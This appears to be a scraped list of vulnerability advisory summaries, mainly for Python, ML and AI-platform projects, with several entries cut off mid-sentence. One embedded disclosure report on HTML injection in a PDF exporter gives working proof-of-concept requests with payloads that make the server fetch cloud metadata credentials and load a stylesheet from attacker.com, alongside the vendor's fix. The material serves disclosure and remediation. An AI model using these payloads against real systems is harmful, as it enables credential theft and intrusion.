Remote code execution in superduper (Python library) through version 0.10.0 allows unauthenticated network attackers to execute arbitrary system commands by submitting malicious query strings with embedded Python code. The _parse_op_part() function in query.py uses unsafe eval() with inadequate context restrictions, enabling attackers to import modules (such as os) and achieve complete server compromise. EPSS score is low (0.07%, 20th percentile) and no active exploitation is confirmed (CISA KEV absent), but SSVC framework rates technical impact as total. User interaction is required (CVSS UI:R), reducing automated exploitation risk. Authentication requirements not confirmed from available data - CVSS vector shows PR:N (no privileges required) but UI:R suggests user-triggered queries.
Remote code execution in Adversarial Robustness Toolbox (ART) versions through 1.20.1 allows unauthenticated network attackers to execute arbitrary Python code via unsafe eval() usage in the Kubeflow robustness evaluation component. The vulnerability accepts unsanitized user input for LossFn and Optimizer parameters in PyTorch model evaluations, enabling complete system compromise. With CVSS 9.8 but only 0.06% EPSS score (18th percentile), this represents a severe theoretical risk that has not yet manifested in widespread exploitation. No public exploit code identified at time of analysis, and the vulnerability requires specific deployment of ART's Kubeflow integration component.
Arbitrary code execution via torch-checkpoint-shrink.py script in ml-engineering project allows remote attackers to execute malicious Python code by providing crafted PyTorch checkpoint files. The vulnerability stems from insecure deserialization where torch.load() processes .pt files without the weights_only=True safeguard, enabling pickle-based arbitrary object instantiation. Despite a critical CVSS 9.8 score, EPSS probability is low (0.06%, 19th percentile) and no public exploit or active exploitation is confirmed, suggesting limited real-world targeting to date. SSVC assessment indicates total technical impact with automatable exploitation potential, making this a priority for organizations using ml-engineering scripts in production environments.
Remote code execution in PySyft Datasite/Server versions 0.9.5 and earlier allows unauthenticated attackers to execute arbitrary Python code on the server through the function submission mechanism. The vulnerability stems from insufficient validation and sandboxing of user-submitted Python functions decorated with @sy.syft_function(), which are executed using unsafe exec() and eval() calls after approval. With an EPSS score of 0.04% and no current KEV listing, this appears to be a high-severity vulnerability without confirmed active exploitation.
Remote code execution in Cognee v0.4.0 and earlier allows unauthenticated attackers to execute arbitrary Python code via the notebook cell execution API endpoint. The vulnerability stems from unsafe use of Python's exec() function without sandboxing or validation, enabling complete system compromise with server process privileges. While not actively exploited (not in KEV), the vulnerability is automatable with total technical impact per SSVC framework, though EPSS indicates low exploitation probability at 0.06%.
Insecure deserialization in Optimate's neural_magic_training.py script enables remote code execution when loading PyTorch model files. The _load_model() function uses torch.load() without the weights_only=True security parameter, allowing attackers with low privileges to execute arbitrary Python code by providing malicious .pt or .pth files via the --model command-line argument. EPSS indicates low exploitation probability at 0.06% with no active exploitation confirmed.
The CosyVoice project thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its model loading process. When loading model files (.pt) from a user-specified directory (via the --model_dir argument), the code uses torch.load() without the security-restrictive weights_only=True parameter. This allows the deserialization of arbitrary Python objects via the Pickle module. An attacker can exploit this by providing a maliciously crafted model directory containing .pt files with embedded pickle payloads. When a victim loads this directory using CosyVoice's web interface, the malicious payload is executed, leading to remote code execution on the victim's system.
Remote code execution in Adversarial Robustness Toolbox (ART) through version 1.20.1 allows unauthenticated network attackers to execute arbitrary Python code by uploading malicious PyTorch model files to pipeline-accessible object storage locations. The vulnerability stems from unsafe use of torch.load() without the weights_only=True parameter in the Kubeflow component's model loading process, enabling Pickle deserialization of arbitrary objects. With CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) but only 0.06% EPSS exploitation probability (19th percentile), this represents a critical-severity issue with low observed real-world targeting, likely due to the specialized nature of ML robustness evaluation deployments. No active exploitation confirmed (not in CISA KEV) and no public exploit code identified at time of analysis.
Remote code execution in Optimate's neural_magic_training.py script allows authenticated attackers to execute arbitrary code via malicious PyTorch model files. The vulnerability stems from unsafe deserialization when loading model state dictionaries without PyTorch's weights_only=True security flag, enabling pickle-based arbitrary object execution. With an EPSS score of 0.06% and no confirmed exploitation, this represents a moderate risk primarily in environments where users can upload or specify model files.
Arbitrary code execution occurs in PyTorch Lightning 2.6.0 and earlier when loading malicious checkpoint files. The LightningModule.load_from_checkpoint() method deserializes untrusted Pickle data without security restrictions, allowing attackers to execute arbitrary Python code when victims open crafted .ckpt files. EPSS score of 0.06% (19th percentile) indicates low observed exploitation probability, and no public exploit code or CISA KEV listing exists at time of analysis. Attack requires local access and user interaction (opening a malicious checkpoint), limiting remote attack scenarios to social engineering or supply chain compromise.
Remote code execution in Mamba language model framework (through version 2.2.6) allows unauthenticated attackers to execute arbitrary Python code by publishing malicious models on HuggingFace Hub. When victims call MambaLMHeadModel.from_pretrained() on a weaponized model repository, insecure pickle deserialization executes attacker-controlled code in the context of the victim's process. Despite the critical CVSS 9.8 score and network attack vector requiring no authentication, EPSS probability remains extremely low (0.02%, 5th percentile), suggesting limited real-world exploitation to date. No CISA KEV listing or public POC identified at time of analysis.
Remote code execution in Ludwig framework ≤0.10.4 allows unauthenticated network attackers to execute arbitrary code by supplying a malicious PyTorch model file to the ludwig serve endpoint. The vulnerability stems from unsafe deserialization in the model loading component, which uses torch.load() without the weights_only=True safety parameter. With CVSS 9.8 (critical network vector, no authentication required) but only 0.02% EPSS, this represents a high-severity issue in vulnerable deployments, though widespread exploitation has not been observed. No CISA KEV listing or public POC identified at time of analysis.
{title}</title>") # ← title is not escaped if metadata: for key, value in metadata.items(): html_parts.append(f'<meta name="{key}" content="{value}">') # ← key/value are not escaped ``` **Data flow trace:** ``` User input: research.query │ ▼ research_routes.py:1321 pdf_title = research.title or research.query │ ▼ research_routes.py:1325-1326 export_report_to_memory(report_content, format, title=pdf_title) │ ▼ pdf_service.py:107 PDFService.markdown_to_pdf(markdown_content, title=pdf_title) │ ▼ pdf_service.py:137 _markdown_to_html(markdown_content, title, metadata) │ ▼ pdf_service.py:172 f"<title>{title}</title>" ← injection point, no escaping │ ▼ pdf_service.py:112 HTML(string=html_content) ← WeasyPrint renders the injected HTML ``` `research.query` is a string submitted by the user via `POST /api/start_research`, stored as-is in the database, and retrieved without any sanitization. When the user triggers `POST /api/v1/research/<research_id>/export/pdf`, this value is embedded unescaped into the HTML document processed by WeasyPrint. **Injection point 1: `<title>` tag breakout** ``` Input: </title><img src="http://169.254.169.254/latest/meta-data/" /> Rendered: <title></title><img src="http://169.254.169.254/latest/meta-data/" /></title> ``` When WeasyPrint encounters the injected `<img>` tag, it issues an HTTP GET request to the value of `src` by default. **Injection point 2: `<meta>` attribute breakout** ``` Input: " /><link rel="stylesheet" href="http://attacker.com/evil.css Rendered: <meta name="..." content="" /><link rel="stylesheet" href="http://attacker.com/evil.css"> ``` WeasyPrint will fetch and apply the external stylesheet, which also constitutes SSRF. --- **Step 1: Log in and submit a research query containing the injection payload** ```http POST /api/start_research HTTP/1.1 Host: localhost:5000 Content-Type: application/json Cookie: session=<valid_session> { "query": "</title><img src=\"http://169.254.169.254/latest/meta-data/iam/security-credentials/\" onerror=\"x\"/>", "mode": "quick", "model_provider": "OLLAMA", "model": "llama3" } ``` The response returns a `research_id`, e.g. `"aaaa-bbbb-cccc-dddd"`. **Step 2: After the research completes, trigger PDF export** ```http POST /api/v1/research/aaaa-bbbb-cccc-dddd/export/pdf HTTP/1.1 Host: localhost:5000 Cookie: session=<valid_session> X-CSRFToken: <csrf_token> ``` **Step 3: Intermediate HTML constructed server-side** ```html <!DOCTYPE html><html><head> <meta charset="utf-8"> <title></title><img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" onerror="x"/></title> </head><body> ...report content... </body></html> ``` **Step 4: WeasyPrint issues an outbound HTTP request to the injected URL** Observed in network monitoring (e.g. `tcpdump`) or the target internal service logs: ``` GET /latest/meta-data/iam/security-credentials/ HTTP/1.1 Host: 169.254.169.254 User-Agent: WeasyPrint/... ``` **Lightweight verification (no SSRF environment required):** Set the query to: ``` </title><title>INJECTED ``` The resulting HTML will contain two `<title>` tags and the PDF document metadata title will read `INJECTED`, confirming successful injection. --- By injecting `<img src>`, `<link href>`, or `<style>@import url()` tags pointing to internal addresses, WeasyPrint will issue HTTP requests on behalf of the server during PDF generation. This allows access to: - **Cloud metadata services** (`169.254.169.254`) on AWS, GCP, or Azure - enabling theft of IAM credentials and instance identity documents. - **Internal network services** (`192.168.x.x`, `10.x.x.x`) - enabling reconnaissance and interaction with internal APIs not exposed to the internet. - **Localhost administrative interfaces** - if SSRF protections are only applied at the user-input validation layer. This is an effective bypass of the application's existing SSRF defenses in `ssrf_validator.py`, because WeasyPrint's outbound resource requests are never routed through that validator. Injected tags can prematurely close `<head>` and insert arbitrary content into `<body>`, causing WeasyPrint to render incorrectly or crash, resulting in a Denial of Service (DoS) condition for the export functionality. By injecting `<link>` or `<style>` tags that load external stylesheets, an attacker can fully control the visual content of the generated PDF, enabling report content forgery or spoofing. - All PDF export operations are affected. - The vulnerability is reachable by any authenticated user - no elevated privileges required. - Because each user operates against their own encrypted database, cross-user exploitation is not possible. However, on any shared or multi-tenant deployment, every authenticated user can independently trigger this vulnerability. --- Apply `html.escape()` to all user-controlled values before embedding them in the HTML template inside `_markdown_to_html`: ```python import html if title: html_parts.append(f"<title>{html.escape(title)}</title>") if metadata: for key, value in metadata.items(): html_parts.append( f'<meta name="{html.escape(str(key))}" content="{html.escape(str(value))}">' ) ``` Additionally, consider configuring WeasyPrint with a custom `url_fetcher` that blocks or restricts outbound HTTP requests to prevent SSRF via injected or legitimately-embedded external resources: ```python def safe_url_fetcher(url, timeout=10): from ssrf_validator import validate_url if not validate_url(url): raise ValueError(f"Blocked unsafe URL in PDF rendering: {url}") return weasyprint.default_url_fetcher(url, timeout=timeout) html_doc = HTML(string=html_content, url_fetcher=safe_url_fetcher) ``` --- *Report generated against commit `f3540fb3` - local-deep-research, branch `main`.* --- Thanks @Firebasky for the detailed report. The complete remediation spans two PRs, both merged to `main`: **#3082** (merged 2026-03-29, shipped in **v1.5.0+**) - closes the HTML-injection sinks: - `html.escape()` now wraps the `title` value in `<title>…</title>` - Same for metadata keys/values in `<meta name="…" content="…">` - Regression tests added in `tests/web/services/test_pdf_service.py` **#3613** (merged 2026-04-24, shipped in **v1.6.0**) - implements the `url_fetcher` recommendation from the Remediation section: - New `_safe_url_fetcher` in `pdf_service.py` delegates to `weasyprint.default_url_fetcher` only after `security.ssrf_validator.validate_url` accepts the URL - Blocks AWS metadata (169.254.169.254), RFC1918, loopback, and non-http(s) schemes - Covers the chained SSRF path through any URL reaching the rendered HTML - markdown body, citations, raw-HTML passthrough via Python-Markdown - Blocked URLs raise `UnsafePDFResourceURLError` (a `ValueError` subclass) so WeasyPrint skips the resource and the render continues - 8 regression tests, including an end-to-end render with `<img src="http://169.254.169.254/…">` embedded in the body **Advisory metadata:** CVSS `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N` (5.0 Moderate), CWEs **CWE-79** + **CWE-918**. **Patched in v1.6.0** - upgrade to v1.6.0 or later to receive both fixes.
Stored cross-site scripting (XSS) via CSS injection in Open edX Platform allows enrolled students to inject arbitrary CSS into discussion notification emails sent to other users by bypassing insufficient HTML sanitization in the clean_thread_html_body() function. The vulnerability affects all versions prior to the fix commit and enables email tracking through malicious stylesheets, content spoofing, and phishing attacks against recipients who view notification emails.
Server-Side Request Forgery in Budibase self-hosted instances allows authenticated Global Builder users to bypass SSRF protections via trivial substring manipulation in plugin URL uploads. The vulnerability exploits a flawed validation check that accepts any URL containing '.tar.gz' anywhere in the string, enabling requests to internal cloud metadata services (AWS IMDS at 169.254.169.254), CouchDB, Redis, and private network ranges when chained with the BLACKLIST_IPS bypass (CVE-2026-45060) or via HTTP redirect chains. CVSS 7.7 (High) with Changed Scope indicates cross-boundary impact from application to infrastructure layer. Vendor-released patch available in version 3.35.10 per GitHub security advisory GHSA-xh5j-727m-w6gg. EPSS data not available; no CISA KEV listing at time of analysis. Publicly available exploit code exists in researcher's GitHub repository with Docker-based proof-of-concept.
{% include %} and {% render %} Liquid tags. The built-in FileSystemLoader and CachingFileSystemLoader failed to reject absolute paths, escaping the configured search path; no public exploit identified at time of analysis but the vendor advisory (GHSA-8p4x-wr7x-3788) publicly documents the bypass mechanism.
Server-side request forgery (SSRF) in GuardDog 1.0.0 through 2.9.0 allows remote attackers to exfiltrate GitHub personal access tokens and probe internal networks via malicious repository URLs. The vulnerability stems from blind string replacement in ProjectScanner.scan_remote() that fails to validate hostnames before appending authentication credentials. No vendor-released patch identified at time of analysis. Publicly available exploit code exists via GitHub advisory reproduction steps. CVSS 8.2 (High) with network vector and no authentication required.
GuardDog versions 2.6.0 through 2.9.0 fail to escape terminal control characters in human-readable scan output, allowing malicious packages to inject ANSI or OSC escape sequences that can clear analyst terminals, rewrite CI logs, or inject spoofed content. The vulnerability affects file paths, code snippets, and messages parsed from package content and rendered directly to stdout without sanitization. Remote attackers can exploit this by distributing packages with specially crafted filenames or source code containing escape sequences, and requires only user interaction (running the scanner on the malicious package).
pgAdmin 4 before version 9.15 allows unauthenticated attackers to bypass account lockout and perform unbounded password-guessing attacks against INTERNAL authentication accounts by exploiting Flask-Security's default /login endpoint, which does not enforce the locked column that the custom /authenticate/login view relies on for brute-force protection. The vulnerability affects only accounts using pgAdmin's INTERNAL authentication source; LDAP, OAuth2, Kerberos, and Webserver authentication methods are not vulnerable because they do not use local passwords.
Unsafe Python pickle deserialization in pgAdmin 4 FileBackedSessionManager allows authenticated local users with session-directory write access to execute arbitrary code as the pgAdmin process. The vulnerability arises from deserializing session files before validating their HMAC signature, enabling payload injection through crafted pickle objects. Attackers require both valid authentication and filesystem write permission to the sessions directory-achievable through misconfiguration or chaining with a separate path-traversal vulnerability. EPSS exploitation probability and KEV status not provided; no public exploit code identified at time of analysis. PostgreSQL maintainers confirmed the flaw and patched it in version 9.15 by implementing pre-deserialization HMAC validation.
Command injection in BentoML 1.4.38 and earlier allows attackers to execute arbitrary code on build hosts when victims containerize malicious bentos. Exploitation occurs during the `bentoml containerize` workflow when unvalidated `envs[*].name` and `docker.base_image` fields from imported bentofile.yaml are interpolated into generated Dockerfiles without escaping, enabling newline-injection of RUN directives executed by `docker build`. This is a sibling vulnerability to CVE-2026-33744 and CVE-2026-35043 which patched the same injection class in `system_packages` fields but left these additional attack surfaces unaddressed. Patch version 1.4.39 available from vendor. No CISA KEV listing or public POC outside gated HuggingFace repository at time of analysis, but end-to-end reproduction confirmed by reporter on BentoML 1.4.38.
Command injection in BentoML allows arbitrary code execution on developer workstations during containerization of untrusted bento packages. Attackers craft malicious bento.yaml files with newline-injected docker.base_image values that smuggle Dockerfile RUN directives into the generated Dockerfile template. When victims run 'bentoml containerize' on the malicious bento, Docker build executes the injected commands on the host system with full developer privileges. This vulnerability (GHSA-78f9-r8mh-4xm2) is part of a documented cluster alongside GHSA-w2pm-x38x-jp44, CVE-2026-33744, and CVE-2026-35043, all involving unsafe Jinja2 template interpolation in BentoML's Dockerfile generation pipeline. Fixed in version 1.4.39. No active exploitation confirmed at time of analysis; EPSS data not available for 2026-dated CVE.
Cross-Site WebSocket Hijacking (CSWSH) in Dozzle's /exec and /attach endpoints allows authenticated shell access bypass when --enable-shell is enabled. The vulnerability stems from WebSocket origin validation bypass (CheckOrigin returns true) combined with SameSite=Lax JWT cookies, enabling attackers on same-site origins (sibling subdomains or localhost services) to hijack victim WebSocket sessions and execute arbitrary commands in Docker containers. Affects all Dozzle deployments through version 10.5.1 with shell access enabled. No public exploit identified at time of analysis, but detailed proof-of-concept exists in the GitHub advisory demonstrating container shell access via Python script. CVSS score not assigned, but CWE-346 classification indicates origin validation failure.
Remote code execution in Hugging Face diffusers (Python package, versions < 0.38.0) is achievable via a TOCTOU race between two sequential Hub downloads inside DiffusionPipeline.from_pretrained, letting a malicious repo owner bypass the trust_remote_code guard and silently execute arbitrary Python during model loading. Exploitation requires user interaction (loading a malicious repo without pinning a revision) and high attack complexity due to a sub-second race window, but no public exploit beyond the reporter's PoC is identified at time of analysis. Affected users running diffusers <0.38.0 should upgrade to 0.38.0 where the issue is fixed.
Path traversal in pymdownx.snippets versions 10.0.1 through 10.21.2 allows unauthenticated remote attackers to read arbitrary files from sibling directories outside the configured base_path, bypassing the restrict_base_path protection intended by CVE-2023-32309. The bypass exploits a string-prefix comparison introduced in PR #2039 that lacks directory-boundary enforcement, enabling a crafted snippet directive like '--8<-- "../docs_secret/leak.txt"' to escape the configured base directory when sibling paths share the same string prefix. Publicly available exploit code (proof-of-concept) exists in the GitHub Security Advisory; the vulnerability is not confirmed actively exploited in the CISA KEV catalog at time of analysis.
Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent attackers to execute arbitrary OS commands by chaining two unprotected API endpoints. The Next.js authentication middleware in src/proxy.js uses a narrow route allowlist that excludes /api/cli-tools/* and /api/mcp/*, letting an attacker register an arbitrary command via POST /api/cli-tools/cowork-settings and then trigger spawn() via GET /api/mcp/[plugin]/sse. Publicly available exploit code exists (PoC published with the GHSA advisory), with CVSS 10.0 reflecting maximum severity across confidentiality, integrity, and availability.
Sensitive HTTP header values entered into the Strawberry GraphQL bundled GraphiQL IDE are serialized into the browser URL query string via JavaScript's history.replaceState, exposing credentials such as Authorization bearer tokens to browser history, copy-paste clipboard actions, and server/proxy/CDN access logs. Affected are strawberry-graphql versions 0.288.4 through 0.315.3 - any Python application exposing the default GraphiQL interface without explicit opt-out. No public exploit has been identified at time of analysis, and the CVSS score of 3.1 (Low) reflects that exploitation requires user interaction; however, in developer and staging environments where the IDE is commonly left enabled, token leakage via shared URLs or log aggregation is a realistic risk.
Arbitrary file write via path traversal in Mailpit's `dump --http` subcommand (versions < 1.30.0) allows any HTTP server impersonating a Mailpit instance to write attacker-controlled bytes to arbitrary paths outside the intended output directory. The attacker controls both the file path (via the message ID field in the JSON response) and the file contents (via the raw message body endpoint), enabling writes anywhere the dumping user has write permission - including cron jobs, shell startup files, and CI artifact directories. Publicly available exploit code exists (Python PoC published in GHSA-qx5x-85p8-vg4j); no confirmed active exploitation at time of analysis.
Server-side request forgery in the zrok Python SDK's ProxyShare component (versions 0.4.47 through 1.1.11) allows remote unauthenticated users to redirect proxied requests to arbitrary hosts by submitting absolute URLs in the request path. Because the Flask handler concatenates user input with the configured target via urllib.parse.urljoin, an attacker (Bob) can replace the share owner's (Alice's) intended target with any host including internal cloud metadata endpoints, and the response is returned to the attacker. No public exploit identified at time of analysis, though the GitHub Security Advisory GHSA-jh67-hwqw-m5r7 documents the technique in detail.
Information disclosure in Algernon web server versions 1.17.6 and earlier allows unauthenticated remote attackers to retrieve full server-side source code, including embedded secrets, by triggering runtime errors in Lua, Pongo2, Amber, or HTML template handlers. When Algernon is started with a single file path (e.g. `algernon page.po2`), single-file mode unconditionally forces debug mode on, activating the PrettyError renderer which returns absolute file paths and complete file contents in HTTP 200 responses. Crucially, the `--prod` hardening flag does not block this behavior for non-`.lua` extensions, and publicly available exploit code exists in the GHSA advisory.
Server-side request forgery in AutoGPT Platform versions 0.1.0 through 0.6.51 allows any authenticated user on a shared deployment to conduct non-blind internal network port scanning and service fingerprinting by exploiting the SendEmailBlock's unvalidated SMTP connection handling. The block accepts user-supplied smtp_server and smtp_port inputs and passes them directly to Python's smtplib.SMTP(), completely bypassing the platform's dedicated SSRF defenses - the validate_url_host() function and BLOCKED_IP_NETWORKS blocklist in backend/util/request.py that every other block observes. Because smtplib surfaces TCP banners in exception messages that are persisted as visible block output, this is a non-blind SSRF, giving attackers readable reconnaissance data about internal hosts and services. No public exploit identified at time of analysis; vendor-released patch is confirmed in version 0.6.52.
Remote code execution in APScheduler (all versions through 3.10.x and 4.0.0a5) is achievable when applications deserialize attacker-controlled data via the bundled JSONSerializer or CBORSerializer. The unmarshal_object routine dynamically imports modules and invokes __setstate__ on arbitrary classes, letting an attacker pivot an untrusted payload into code execution; publicly available exploit code exists, though EPSS remains low at 0.06% (19th percentile).
Local privilege escalation to arbitrary code execution in MLflow versions prior to 3.11.0 stems from insecure temporary directory permissions (0o777 and 0o770) created by NFS and model-download helpers. Any local user sharing the filesystem - particularly on Databricks where NFS is enabled by default - can overwrite cloudpickle-serialized model artifacts and gain code execution when another user's process deserializes them via cloudpickle.load(). No public exploit is identified at time of analysis, and the issue is a continuation of CVE-2025-10279 which was only partially fixed.
Local file disclosure in NiceGUI versions <= 3.11.1 allows remote unauthenticated attackers to read arbitrary files accessible to the server process when applications pass user-controlled content to ui.restructured_text(). The flaw stems from Docutils being invoked without disabling file-insertion directives (include, csv-table :file:, raw :file:), enabling exfiltration of secrets, credentials, and source code. No public exploit identified at time of analysis, but the vendor advisory provides full directive-level proof patterns.
Remote denial-of-service in OpenTelemetry eBPF Instrumentation (OBI) versions 0.7.0 through 0.8.x allows unauthenticated attackers to crash the privileged instrumentation process by sending a crafted memcached storage command with an oversized `<bytes>` field. The integer overflow in the memcached text protocol parser produces a negative payload length that triggers a Go runtime panic in LargeBufferReader.Peek, halting telemetry collection until OBI is restarted. Publicly available exploit code exists in the GHSA-43g7-cwr8-q3jh advisory, but there is no public exploit identified beyond the PoC and the vulnerability is not listed in CISA KEV.
Remote code execution in the amazon-redshift-python-driver (versions prior to 2.1.14) allows a malicious or compromised Redshift server, or a man-in-the-middle attacker positioned on the network path, to execute arbitrary Python code on any client that connects. The root cause is unsafe use of Python's eval() against untrusted server-supplied data inside the vector_in() function. No public exploit identified at time of analysis, but the CVSS 4.0 base score of 9.3 and PR:N/UI:N vector make this a high-priority client-side supply-chain-style risk.
Denial of service in OpenTelemetry eBPF Instrumentation (OBI) versions prior to 0.9.0 allows remote attackers to crash the telemetry agent by sending a malformed Postgres BIND frame with an empty or unterminated portal name payload to any monitored service. The defect lives in OBI's passive Postgres protocol parser, where missing NUL-terminator validation causes a Go slice-bounds panic, halting telemetry collection on the affected node. Publicly available exploit code exists in the GHSA-pgvv-q3wf-mm9m advisory, though the issue is not listed in CISA KEV and EPSS data was not provided.
{tenant}/databases/{db}/collections endpoint. The flaw carries a maximum CVSS 4.0 score of 10.0 and was disclosed publicly by HiddenLayer; no public exploit identified at time of analysis, though detailed research has been published.
SGLangs multimodal generation runtime is vulnerable to unauthenticated remote code execution when the --enable-custom-logit-processor option is enabled, as Python objects loaded via dill.loads() will be deserialized without validation.
python jsonpickle 2.0.0 contains a remote code execution vulnerability that allows attackers to execute arbitrary Python commands by deserializing malicious JSON payloads containing py/repr objects. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
Budibase's REST datasource integration before version 3.38.1 bypasses IP blacklist security controls through HTTP redirect following. Authenticated Builder-level users can exploit this to access cloud metadata services and internal databases by redirecting requests through attacker-controlled servers, potentially stealing AWS/GCP/Azure credentials. This vulnerability class was previously fixed in automation steps but the REST integration was overlooked, creating an inconsistent security posture.
{filename:path} endpoint fails to validate paths containing %2F-encoded directory separators, bypassing Starlette's URL normalization. Fixed in version 1.2.0 with no public exploit identified at time of analysis.
Archive extraction boundary failure in Microsoft APM's legacy-bundle probe allows local attackers to overwrite arbitrary files on Windows systems running Python 3.10 or 3.11. When users run 'apm install' on a malicious .tar.gz file, untrusted tar members bypass path validation, enabling absolute path writes (e.g., D:/...) that compromise system integrity. Fixed in version 0.13.0. No active exploitation confirmed at time of analysis, but the local attack vector with user interaction required (CVSS AV:L/UI:R) limits real-world risk to social engineering scenarios targeting AI agent developers on Windows platforms.
Authentication bypass in MLflow 3.9.0 and earlier allows unauthenticated remote attackers to access protected Job API and OpenTelemetry trace ingestion endpoints when the server runs with basic-auth enabled via uvicorn/ASGI. Attackers can submit jobs, read results, cancel operations, and inject trace data without credentials. The FastAPI permission middleware incorrectly enforced authentication only on /gateway/ routes, leaving /ajax-api/3.0/jobs/* and /v1/traces unprotected due to architectural mismatch between Flask and FastAPI authentication mechanisms. Fixed in version 3.10.0 with GitHub commit bb62e77 adding proper validators for all FastAPI routes.
python-utcp CLI subprocess environment passes all process-level secrets to every tool call. When chained with CVE-2026-45369 command injection, remote authenticated attackers with low-privilege LLM tool access can exfiltrate AWS credentials, API keys, database URLs, and other environment variables in a single HTTP request. Patch available in version 1.1.2 (NVD references 1.1.3 as fixed version). GitHub security advisory confirms proof-of-concept demonstrating credential theft via env dump to attacker-controlled endpoint.
Command injection in python-utcp allows remote attackers to execute arbitrary shell commands on Unix and Windows systems when user-controlled tool arguments are processed by the CLI communication protocol module. The _substitute_utcp_args method in cli_communication_protocol.py directly embeds unsanitized user input into bash or PowerShell commands without escaping, enabling full remote code execution. Vendor-released patch available in version 1.1.2 with shell-quoting mitigation (shlex.quote on Unix, single-quoted literals on Windows). CVSS 8.3 indicates high complexity and required user interaction, but scope change enables container/sandbox escape scenarios. No public exploit code or CISA KEV listing identified at time of analysis, though detailed proof-of-concept exists in the GitHub security advisory demonstrating data exfiltration via curl.
Server-Side Request Forgery in @utcp/http <= 1.1.1 allows remote attackers to redirect tool invocations to internal services via malicious OpenAPI specs. An attacker hosting a malicious OpenAPI specification on a legitimate HTTPS endpoint can declare internal server URLs (e.g., http://127.0.0.1:9090 or http://169.254.169.254) in the servers array; the OpenApiConverter blindly trusts these URLs without revalidation during tool invocation, enabling access to cloud metadata endpoints, internal databases, and loopback services. Additionally, a prefix-bypass in hostname validation (startsWith check) allows URLs like http://localhost.evil.com to bypass discovery-time restrictions. Patch version 1.1.2 is available.
Multiple concurrent LDAP or OAuth first-login requests on a freshly deployed Open WebUI instance can all receive administrator privileges through a TOCTOU race condition in role assignment logic. The vulnerability affects deployments using LDAP or OAuth authentication on instances with no existing users. While the regular signup handler was explicitly patched for this race condition in earlier code ('Insert with default role first to avoid TOCTOU race'), the LDAP and OAuth authentication paths were never updated with the same fix. Vendor-released patch available in version 0.9.0 (April 2026). No active exploitation confirmed (not in CISA KEV), though publicly available exploit code exists per GitHub advisory GHSA-h3ww-q6xx-w7x3. CVSS 8.1 (High) reflects network attack vector but requires high attack complexity (precise timing of concurrent requests during narrow first-deployment window).
Open WebUI versions through 0.8.11 allow authenticated users to execute arbitrary Python code in the Jupyter container by bypassing the ENABLE_CODE_EXECUTION=false configuration flag. The /api/v1/utils/code/execute endpoint fails to enforce the admin-configured feature gate (CWE-863: Incorrect Authorization), enabling any verified user to run code even when administrators believe execution is disabled. The vulnerability is confirmed by vendor POC (verified 2026-03-25) demonstrating successful code execution, file access, and SSRF to internal Docker services despite explicit admin configuration disabling the feature. Vendor-released patch available in v0.8.12 (commit 6d736d3c5) enforces the configuration check before dispatching code to Jupyter.
{id}/files to any user with read access. This affects all default Docker deployments where chat sharing is enabled. Vendor-released patch available in v0.9.0 (commit 2e52ad8ff). No active exploitation confirmed (not in CISA KEV). CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H scores 8.0, though real-world impact extends beyond confidentiality to permanent data destruction with no recovery mechanism.
URL parser mismatch in Open WebUI allows authenticated users to bypass SSRF protections and access internal network resources. The validate_url function uses Python's urlparse library to extract hostnames for validation, while the requests library handles actual HTTP requests. These libraries disagree on parsing URLs containing backslash characters (e.g., http://127.0.0.1:6666\@1.1.1.1), allowing attackers to craft URLs that pass validation as external addresses but resolve to internal hosts. Exploitation requires low-privilege authentication but no user interaction, enabling access to cloud metadata endpoints and internal services. Fixed in version 0.9.5 per GitHub advisory GHSA-8w7q-q5jp-jvgx.
{task_id}. Attackers can disrupt system-wide chat generation and background processing by continuously canceling active tasks across the multi-user instance. Publicly available exploit code exists. Vendor-released patch in v0.9.0 restricts global task endpoints to admin-only and introduces a scoped /api/tasks/chat/{chat_id}/stop endpoint for legitimate user-owned task termination. CVSS 7.1 (AV:N/AC:L/PR:L/UI:N) reflects network-accessible, low-complexity exploitation requiring only authenticated low-privilege access, with high availability impact and low confidentiality impact from task enumeration.
Insecure Direct Object Reference (IDOR) in Open WebUI's retrieval API allows authenticated users to bypass knowledge base access controls and directly access, modify, or delete other users' private knowledge bases by supplying the target UUID as a collection name. The authorization gap affects seven endpoints: two read endpoints (/query/doc, /query/collection) permit exfiltration of private knowledge base content, while five write endpoints (/process/text, /process/file, /process/files/batch, /process/web, /process/youtube) enable content injection, poisoning, or complete data destruction via overwrite. Affects Open WebUI <= 0.9.4; fixed in v0.9.5 via PR #22109. EPSS data not available; no confirmed active exploitation (CVSS 7.5 reflects AC:H due to UUID prerequisite, but UUIDs leak through multiple channels per researcher analysis).
Open WebUI's GET /api/v1/retrieval/ endpoint discloses RAG pipeline configuration including embedding models, chunking parameters, and RAG templates to unauthenticated attackers with a single HTTP request. The vulnerability affects v0.9.2 and earlier, where this endpoint lacks authentication guards present on all adjacent endpoints, enabling reconnaissance for RAG poisoning attacks and infrastructure fingerprinting without requiring credentials, authentication tokens, or user interaction.
Mass assignment vulnerability in Open WebUI v0.9.2 allows authenticated attackers to spoof user identities and manipulate model evaluation data by injecting a `user_id` field into feedback requests. The `POST /api/v1/evaluations/feedback` endpoint fails to properly validate and segregate server-set values from user-supplied input, enabling attackers to create feedback records attributed to arbitrary users and corrupt Elo-based model leaderboard rankings. Patch available in v0.9.5.
{id}/update) fails to enforce the workspace.tools authorization check that gates code execution, allowing users explicitly denied code execution capabilities to bypass this security boundary. This breaks Open WebUI's documented trust model where workspace.tools permission is intentionally disabled by default and 'equivalent to giving them shell access to the server.' Exploitation achieves root code execution (PID 1) in default Docker deployments, enabling extraction of secrets (WEBUI_SECRET_KEY, API keys), database access, and filesystem read/write. Confirmed by GitHub security advisory GHSA-p4fx-23fq-jfg6. No public exploit or KEV listing at time of analysis, but detailed proof-of-concept with Burp Collaborator confirmation exists in the advisory.
Modify messages from any channel member in Open WebUI v0.8.12 through v0.9.4 via Insecure Direct Object Reference (IDOR) in the message update API endpoint. Any authenticated user with group or direct message channel membership can tamper with messages sent by other members, including administrators, by bypassing message ownership verification. Publicly available exploit code exists demonstrating the vulnerability; patch available in v0.9.5.
